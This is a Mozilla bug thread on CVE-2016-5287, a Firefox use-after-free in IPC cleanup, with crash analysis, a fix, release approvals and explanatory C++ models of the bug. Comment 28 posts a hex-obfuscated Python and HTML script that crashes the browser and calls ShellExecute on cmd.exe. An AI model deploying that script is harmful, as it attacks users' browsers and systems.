Bug 1309823 (CVE-2016-5287) - Crash in nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors
Status: Closed, RESOLVED FIXED (opened 8 years ago, closed 8 years ago)
Categories: Core :: DOM: Service Workers, defect
Target milestone: mozilla52
People: Reporter: philipp; Assigned: bkelly
Keywords: 4 keywords
Attachments (2 files):
- patch, 2.02 KB: billm: review+; lizzard: approval-mozilla-aurora+, approval-mozilla-beta+, approval-mozilla-release+; abillings: sec-approval+
- text/plain, 8.18 KB
This bug was filed from the Socorro interface and is
report bp-6e8fc599-f021-4b0c-b5a3-cda7d2161013.
=============================================================
Crashing Thread (27)
Frame Module Signature Source
0 xul.dll nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>::SwapArrayElements<nsTArrayInfallibleAllocator, nsTArrayInfallibleAllocator>(nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>&, unsigned int, unsigned int) obj-firefox/dist/include/nsTArray-inl.h:346
1 xul.dll nsTArray_Impl<nsCOMPtr<nsIRunnable>, nsTArrayInfallibleAllocator>::SwapElements<nsTArrayInfallibleAllocator>(nsTArray_Impl<nsCOMPtr<nsIRunnable>, nsTArrayInfallibleAllocator>&) obj-firefox/dist/include/nsTArray.h:1661
2 xul.dll mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors(nsTArray<mozilla::ipc::FileDescriptor>&) ipc/glue/FileDescriptorSetChild.cpp:28
3 xul.dll mozilla::ipc::`anonymous namespace'::CleanupIPCStream ipc/glue/IPCStreamUtils.cpp:183
4 xul.dll mozilla::ipc::AutoIPCStream::~AutoIPCStream() ipc/glue/IPCStreamUtils.cpp:343
5 xul.dll mozilla::UniquePtr<mozilla::ipc::AutoIPCStream, mozilla::DefaultDelete<mozilla::ipc::AutoIPCStream> >::reset(mozilla::ipc::AutoIPCStream*) obj-firefox/dist/include/mozilla/UniquePtr.h:342
6 xul.dll mozilla::dom::cache::AutoChildOpArgs::~AutoChildOpArgs() dom/cache/AutoUtils.cpp:141
7 xul.dll mozilla::dom::cache::Cache::Put(mozilla::dom::RequestOrUSVString const&, mozilla::dom::Response&, mozilla::ErrorResult&) dom/cache/Cache.cpp:421
8 xul.dll mozilla::dom::CacheBinding::put obj-firefox/dom/bindings/CacheBinding.cpp:873
9 xul.dll mozilla::dom::CacheBinding::put_promiseWrapper obj-firefox/dom/bindings/CacheBinding.cpp:893
This signature is regressing in 50.0b builds and is mainly happening in the content process. In 50.0b6 it currently accounts for 3% of all content crashes.
Some correlations for the signature on 50.0b:
(100.0% in signature vs 00.23% overall) address = 0xffffffffe5e5e5e9
(81.98% in signature vs 21.36% overall) "EGL?" in app_notes = true
(81.98% in signature vs 21.96% overall) "WebGL?" in app_notes = true
(100.0% in signature vs 40.37% overall) reason = EXCEPTION_ACCESS_VIOLATION_READ
(72.97% in signature vs 20.35% overall) "EGL+" in app_notes = true
(80.18% in signature vs 27.71% overall) dom_ipc_enabled = 1
(72.97% in signature vs 20.83% overall) "WebGL+" in app_notes = true
(72.97% in signature vs 21.48% overall) "GL Context+" in app_notes = true
(72.97% in signature vs 21.48% overall) "GL Context?" in app_notes = true
Comment 1 (Reporter) • 8 years ago
The crash first started to appear on 2016-10-10 with various different beta versions though, so some external factor may play into this as well.
Comment 2 (Reporter) • 8 years ago
Based on https://bugzilla.mozilla.org/show_bug.cgi?id=1283823#c26 it may be that the e5e5e5e part of the address is indicative of a security issue, so I'm flagging this as a precaution.
Group: core-security
Flags: needinfo?(dveditz)
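Comment 2 flags the fault address 0xffffffffe5e5e5e9 because 0xe5 is the byte mozjemalloc writes over freed allocations: a fault at an address built from 0xe5 bytes plus a small field offset usually means a pointer was read out of already-freed memory, which is why such addresses get triaged as likely use-after-free. As an added example that is not part of this bug report or Mozilla's tooling, here is a small triage helper encoding that check; the function names are hypothetical, and the sign-extended 32-bit form is the one seen in this report.

```cpp
#include <cstdint>
#include <cstdio>
#include <string>

// mozjemalloc overwrites freed memory with 0xe5 bytes, so a pointer loaded
// from a freed object reads as 0xe5e5e5e5 (32-bit) or 0xe5e5e5e5e5e5e5e5 (64-bit).
constexpr uint64_t kPoison32 = 0xe5e5e5e5ULL;
constexpr uint64_t kPoison64 = 0xe5e5e5e5e5e5e5e5ULL;

struct PoisonMatch {
    bool matched;    // fault address lies within aMaxFieldOffset of a poison pointer
    int width;       // 32 or 64: width of the poison pointer matched, 0 if none
    int64_t offset;  // distance from the poison pointer, i.e. the member offset read
};

// 32-bit Windows minidumps report the fault address sign-extended to 64 bits
// (0xffffffffe5e5e5e9 on this bug); fold that back to the 32-bit value.
uint64_t NormalizeFaultAddress(uint64_t aAddr) {
    if ((aAddr >> 32) == 0xffffffffULL) {
        return aAddr & 0xffffffffULL;
    }
    return aAddr;
}

// Classifies a fault address. aMaxFieldOffset bounds how far from the poison
// pointer a struct member access may land and still count as a match.
PoisonMatch ClassifyFaultAddress(uint64_t aRawAddr, int64_t aMaxFieldOffset = 4096) {
    uint64_t addr = NormalizeFaultAddress(aRawAddr);
    const struct { uint64_t base; int width; } candidates[] = {
        {kPoison32, 32}, {kPoison64, 64}};
    for (const auto& c : candidates) {
        // Unsigned subtraction wraps, so the cast yields a negative offset
        // when the address sits just below the poison value.
        int64_t off = static_cast<int64_t>(addr - c.base);
        if (off >= -aMaxFieldOffset && off <= aMaxFieldOffset) {
            return {true, c.width, off};
        }
    }
    return {false, 0, 0};
}

// Convenience wrapper for the hex form found in crash reports ("0x..." or bare).
PoisonMatch ClassifyHex(const std::string& aHex) {
    return ClassifyFaultAddress(std::stoull(aHex, nullptr, 16));
}

int main() {
    // Constructed samples: the address from this bug and an ordinary user-space one.
    const char* samples[] = {"0xffffffffe5e5e5e9", "0x7ffe12345678"};
    for (const char* s : samples) {
        PoisonMatch m = ClassifyHex(s);
        std::printf("%s -> %s (width %d, offset %lld)\n", s,
                    m.matched ? "freed-memory poison" : "no poison pattern",
                    m.width, static_cast<long long>(m.offset));
    }
    return 0;
}
```

For this bug's address the helper reports a 32-bit poison pointer with offset 4, which reads as "a 4-byte field at offset 4 of an object whose pointer came from freed memory"; that is consistent with the generic nsTArray swap frames at the top of the stack, since the array header is among the first things the swap touches.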
Comment 3 • 8 years ago
Not very useful (very generic) stack, but looks like UAF and something to do with workers and maybe the SW cache.
Group: core-security → dom-core-security
Component: General → DOM: Workers
Flags: needinfo?(dveditz) → needinfo?(bkelly)
Keywords: sec-high, testcase-wanted
Comment 4 • 8 years ago
Maybe the URLs in the crashes will be useful if this hit different build IDs around the same time.
Lots of zalora.co.id
Updated • 8 years ago
Component: DOM: Workers → DOM: Service Workers
Comment 5 (Assignee) • 8 years ago
I would have guessed this was introduced in bug 1093357, but that landed in FF49.
I think I see the problem, though:
if (!aConsumedByIPC) {
  Unused << fdSetActor->Send__delete__(fdSetActor);
}
// FileDescriptorSet doesn't clear its fds in its ActorDestroy, so we
// unconditionally forget them here. The fds themselves are auto-closed in
// ~FileDescriptor since they originated in this process.
fdSetActor->ForgetFileDescriptors(fds);
We should delete the actor after telling it to forget its file descriptors.
Assignee: nobody → bkelly
Status: NEW → ASSIGNED
Flags: needinfo?(bkelly)
Comment 6 (Assignee) • 8 years ago
Sylvestre, if we do a point release for FF49, I'd like to have this ride-along. I will have patches up shortly.
Flags: needinfo?(sledru)
Comment 7 (Assignee) • 8 years ago
I think this is a pretty clear ordering violation. We must call the method on the actor before starting its deletion.
Attachment #8800794 - Flags: review?(wmccloskey)
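The ordering bug quoted in comment 5 and the fix described in comment 7, reduced to a self-contained model. This is an added example, not the patch on this bug or Mozilla's code: FdSetActor, FileDescriptor, the gLiveActors registry and the two Cleanup functions are hypothetical stand-ins for the IPDL actor and the IPCStreamUtils.cpp code, and the registry plays the role a sanitizer would, flagging a call on a destroyed actor instead of dereferencing it.

```cpp
#include <cstdio>
#include <set>
#include <utility>
#include <vector>

// Stand-in for mozilla::ipc::FileDescriptor: just the numeric fd.
struct FileDescriptor {
    int mFd;
};

class FdSetActor;
// Tiny lifetime tracker standing in for a sanitizer: every actor that has been
// constructed and not yet destroyed. Nothing is allocated between the delete
// and the lookup in this example, so address reuse cannot fool the check.
static std::set<const FdSetActor*> gLiveActors;

// Stand-in for the FileDescriptorSet actor. As with the real IPDL actor,
// Send__delete__() may destroy the object before it returns, so any member
// access after it is a use-after-free.
class FdSetActor {
public:
    explicit FdSetActor(const std::vector<FileDescriptor>& aFds) : mFds(aFds) {
        gLiveActors.insert(this);
    }
    ~FdSetActor() { gLiveActors.erase(this); }

    // Models Send__delete__(): in this toy the actor is destroyed synchronously.
    static bool Send__delete__(FdSetActor* aActor) {
        delete aActor;
        return true;
    }

    // Hands the fds to the caller, who becomes responsible for closing them.
    void ForgetFileDescriptors(std::vector<FileDescriptor>& aFds) {
        aFds.swap(mFds);
    }

private:
    std::vector<FileDescriptor> mFds;
};

// Checked call used by both orderings below: refuses to touch an actor that
// has already been destroyed and reports that instead of crashing.
static bool CheckedForget(FdSetActor* aActor, std::vector<FileDescriptor>& aFds) {
    if (gLiveActors.count(aActor) == 0) {
        std::puts("use-after-free: ForgetFileDescriptors() on a destroyed actor");
        return false;
    }
    aActor->ForgetFileDescriptors(aFds);
    return true;
}

// Ordering from the crashing code (comment 5): delete first, forget second.
bool CleanupIPCStreamBuggy(FdSetActor* aActor, bool aConsumedByIPC,
                           std::vector<FileDescriptor>& aFds) {
    if (!aConsumedByIPC) {
        FdSetActor::Send__delete__(aActor);  // actor may be gone after this line
    }
    return CheckedForget(aActor, aFds);      // dangling when !aConsumedByIPC
}

// Ordering from the fix (comment 7): take the fds out of the actor while it is
// still alive, and only then start its destruction.
bool CleanupIPCStreamFixed(FdSetActor* aActor, bool aConsumedByIPC,
                           std::vector<FileDescriptor>& aFds) {
    bool ok = CheckedForget(aActor, aFds);
    if (!aConsumedByIPC) {
        FdSetActor::Send__delete__(aActor);
    }
    return ok;
}

struct Outcome {
    bool safe;            // no use-after-free detected
    size_t fdsRecovered;  // fds handed back to the caller for closing
    bool actorAlive;      // actor still registered after cleanup
};

// Runs one cleanup variant on a fresh actor holding two constructed fds.
Outcome Run(bool aUseFixed, bool aConsumedByIPC) {
    std::vector<FileDescriptor> initial{{10}, {11}};
    FdSetActor* actor = new FdSetActor(initial);
    std::vector<FileDescriptor> fds;
    bool safe = aUseFixed ? CleanupIPCStreamFixed(actor, aConsumedByIPC, fds)
                          : CleanupIPCStreamBuggy(actor, aConsumedByIPC, fds);
    bool alive = gLiveActors.count(actor) > 0;  // compares the address only
    if (alive) {
        delete actor;  // when consumed by IPC, the other side owns teardown
    }
    return {safe, fds.size(), alive};
}

int main() {
    Outcome buggy = Run(false, false);
    Outcome fixed = Run(true, false);
    std::printf("buggy: safe=%d fds=%zu\nfixed: safe=%d fds=%zu\n",
                buggy.safe, buggy.fdsRecovered, fixed.safe, fixed.fdsRecovered);
    return (buggy.safe || !fixed.safe) ? 1 : 0;
}
```

The model also shows why the crash only appears on the !aConsumedByIPC path: when the stream was consumed by IPC the actor is not deleted here, so both orderings behave identically, and the bug stays invisible until cleanup runs without the actor having been handed off.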
Comment 8 (Assignee) • 8 years ago
Attachment #8800794 - Flags: review?(wmccloskey) → review+
Comment 9 • 8 years ago
OK, we are discussing a dot release for a JS issue; redirecting to Liz.
Flags: needinfo?(sledru) → needinfo?(lhenry)
Comment 10 • 8 years ago
This bug has 49 as unaffected, so it doesn't sound like a candidate for a dot release.
Also, this should have sec-approval before it lands if you think 51/52 are also affected.
Flags: needinfo?(lhenry)
Comment 11 (Assignee) • 8 years ago
Comment on attachment 8800794 [details] [diff] [review]
Forget file descriptors before starting actor destruction. r=billm
[Security approval request comment]
How easily could an exploit be constructed based on the patch?
Moderately difficult. They would have to understand the implication that Send__delete__() can immediately delete an actor and how this ipc/glue code is called.
Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
I don't think the commit message includes any more information than the patch. It references "destruction", but I am moving a method that includes "delete" in its name.
Which older supported branches are affected by this flaw?
FF49+
If not all supported branches, which bug introduced the flaw?
Bug 1093357
Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
This should apply cleanly.
How likely is this patch to cause regressions; how much testing does it need?
Minimal risk. It's reordering two calls. We've fixed similar bugs in the past with changes almost identical to this.
I've also done a try build with an obscured patch name/message:
https://treeherder.mozilla.org/#/jobs?repo=try&revision=e9f99b26d967bfbbd91485cf503dbb78d9aaa429
Attachment #8800794 - Flags: sec-approval?
Attachment #8800794 - Flags: approval-mozilla-release?
Attachment #8800794 - Flags: approval-mozilla-beta?
Attachment #8800794 - Flags: approval-mozilla-aurora?
Comment 12 (Assignee) • 8 years ago
Liz, it was marked 49 unaffected because the crashes are not showing there. The bug that introduced the flaw did land in FF49, though. If no other point release was happening I probably would not push for one. But I think it would be prudent to do this as a ride-along.
Flags: needinfo?(lhenry)
Comment 13 (Assignee) • 8 years ago
Based on bug 1093357 I'm going to mark FF49 affected.
Comment 14 • 8 years ago
sec-approval+ for trunk. We'll need release management approval for Aurora and Beta patches. I'd like to take it there though.
status-firefox-esr45: --- → unaffected
tracking-firefox50: --- → ?
tracking-firefox51: --- → ?
tracking-firefox52: --- → +
Flags: needinfo?(rkothari)
Updated • 8 years ago
Attachment #8800794 - Flags: sec-approval? → sec-approval+
Comment 15 • 8 years ago
Comment on attachment 8800794 [details] [diff] [review]
Forget file descriptors before starting actor destruction. r=billm
Sec-high, let's take this on release as well as other branches. I am now aiming a dot release for mid-next week.
Flags: needinfo?(lhenry)
Attachment #8800794 - Flags: approval-mozilla-release? → approval-mozilla-release+
Attachment #8800794 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Attachment #8800794 - Flags: approval-mozilla-aurora? → approval-mozilla-aurora+
Thanks Liz!
Flags: needinfo?(rkothari)
Comment 17 • 8 years ago
Went ahead and landed this on inbound, to be able to uplift to the release branches hopefully before the weekend: https://hg.mozilla.org/integration/mozilla-inbound/rev/e62579becf83fb7b8524bba995af9c94b20c4ec9
Comment 18 (Assignee) • 8 years ago
Per comment 15.
Carsten, thanks for landing!
Comment 19 • 8 years ago
https://hg.mozilla.org/releases/mozilla-aurora/rev/7bc185ff4e8b
https://hg.mozilla.org/releases/mozilla-beta/rev/752c1320cca5
https://hg.mozilla.org/releases/mozilla-release/rev/6b065281b17b
Status: ASSIGNED → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla52
Hi Ben, this is another crash signature that is trending up in Beta50. https://crash-stats.mozilla.org/signature/?date=%3C2016-10-17T17%3A10%3A00%2B00%3A00&date=%3E%3D2016-10-10T17%3A10%3A00%2B00%3A00&product=Firefox&version=50.0b&signature=nsTArray_base%3CT%3E%3A%3ASwapArrayElements%3CT%3E%20%7C%20nsTArray_Impl%3CT%3E%3A%3ASwapElements%3CT%3E%20%7C%20mozilla%3A%3Aipc%3A%3AFileDescriptorSetParent%3A%3AForgetFileDescriptors
Do you think this is a different problem or it should also be fixed with this one?
Flags: needinfo?(bkelly)
Comment 23 (Assignee) • 8 years ago
(In reply to Ritu Kothari (:ritu) from comment #22)
> Hi Ben, this is another crash signature that is trending up in Beta50.
> https://crash-stats.mozilla.org/signature/?date=%3C2016-10-17T17%3A10%3A00%2B00%3A00&date=%3E%3D2016-10-10T17%3A10%3A00%2B00%3A00&product=Firefox&version=50.0b&signature=nsTArray_base%3CT%3E%3A%3ASwapArrayElements%3CT%3E%20%7C%20nsTArray_Impl%3CT%3E%3A%3ASwapElements%3CT%3E%20%7C%20mozilla%3A%3Aipc%3A%3AFileDescriptorSetParent%3A%3AForgetFileDescriptors
>
> Do you think this is a different problem or it should also be fixed with
> this one?
It should be fixed with the patches landed here. What beta do we expect this fix to be included in? I thought it would be in 50b7, but maybe I was confused.
Flags: needinfo?(bkelly)
Comment 24 (Assignee) • 8 years ago
Ah, I see FF50b7 was built from this push:
https://hg.mozilla.org/releases/mozilla-beta/rev/6efc0964ec62bc4abfdc4cb1dc7cc461c3238634
Which does not seem to include this bug's patch yet. So I am hopeful both these crashes will be fixed by this patch.
Comment 25 (Assignee) • 8 years ago
A number of service worker related intermittents seem to have dropped off to zero over the weekend as well. Hoping that those are all fixed by this.
Updated • 8 years ago
Alias: CVE-2016-5287
Comment 26 (Assignee) • 8 years ago
FWIW there have been no reports of either crash signature since this was released.
Comment 27 • 8 years ago
I'm adding the second signature here then. It's strange because it stopped abruptly on 2016-10-17.
Crash Signature: [@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors] → [@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors]
[@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetPa…
Updated • 8 years ago
Group: dom-core-security
Comment 28 • 8 years ago
#Exploit Title: Mozilla Firefox 49.0.2 Crash
#2-11-2016
#Author: sultan albalawi
#video :https://www.facebook.com/pentest3/videos/vb.100012552940568/204971129931317/?type=2&theater
#it's working with tor browser you can try
#Tested on:win7
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
host='192.168.88.254'
port=8080
i=0
ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
ban+='\n'
ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65'
ban+='\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
print ban
print "please wait ...."
htmlcrach=('''\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x65\x78\x28\x29\x0d\x0a\x7b\x0d\x0a\x76\x61\x72\x20\x6f\x62\x6a\x53\x68\x65\x6c\x6c\x20\x3d\x20\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x73\x68\x65\x6c\x6c\x2e\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22\x29\x3b\x0d\x0a\x6f\x62\x6a\x53\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x22\x63\x6d\x64\x2e\x65\x78\x65\x22\x2c\x20\x22\x63\x64\x20\x43\x3a\x20\x43\x3a\x5c\x5c\x63\x64\x20\x63\x3a\x5c\x5c\x65\x78\x74\x5f\x66\x69\x6c\x65\x20\x6d\x61\x69\x6e\x2e\x65\x78\x65\x20\x74\x65\x73\x74\x2e\x74\x78\x74\x22\x2c\x20\x22\x43\x3a\x5c\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x22\x2c\x20\x22\x6f\x70\x65\x6e\x22\x2c\x20\x31\x29\x3b\x0d\x0a\x7d\x0d\x0a\x7b\x0d\x0a\x76\x61\x72\x20\x62\x75\x66\x20\x3d\x20\x22\x22\x3b\x0d\x0a\x66\x6f\x72\x20\x28\x76\x61\x72\x20\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x35\x30\x30\x30\x30\x3b\x20\x69\x2b\x2b\x29\x20\x7b\x0d\x0a\x62\x75\x66\x20\x2b\x3d\x20\x22\x41\x22\x3b\x0d\x0a\x7d\x0d\x0a\x76\x61\x72\x20\x62\x75\x66\x66\x20\x3d\x20\x62\x75\x66\x3b\x0d\x0a\x66\x6f\x72\x20\x28\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x35\x30\x30\x30\x3b\x20\x69\x2b\x2b\x29\x20\x7b\x0d\x0a\x62\x75\x66\x66\x20\x2b\x3d\x20\x62\x75\x66\x3b\x0d\x0a\x7d\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x74\x69\x74\x6c\x65\x20\x3d\x20\x62\x75\x66\x66\x3b\x0d\x0a\x7d\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d\x0a\x3c\x2f\x61\x3e\x3c\x2f\x62\x6f\x64\x79\x3e\x3c\x2f\x68\x74\x6d\x6c\x3e''')
while i <= 5000:
    i+=1
    ban+=htmlcrach
class Req(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type','text/html')
        self.end_headers()
        self.wfile.write(htmlcrach)
class runHTTP(HTTPServer):
    def __init__(self,host,port):
        ipadd=(host,port)
        HTTPServer.__init__(self,ipadd,Req)
def createfile():
    global filecreate
    filecreate = "test.html"
    open(filecreate, "wb").write(htmlcrach)
    print ('file done: {}').format(filecreate)
def start():
    global filecreate
    ser=runHTTP(host,port)
    print "http://{}:{}/{}".format(host,port,filecreate)
    ser.serve_forever()
createfile()
start()
Flags: needinfo?(madperson)
Comment 29 • 8 years ago
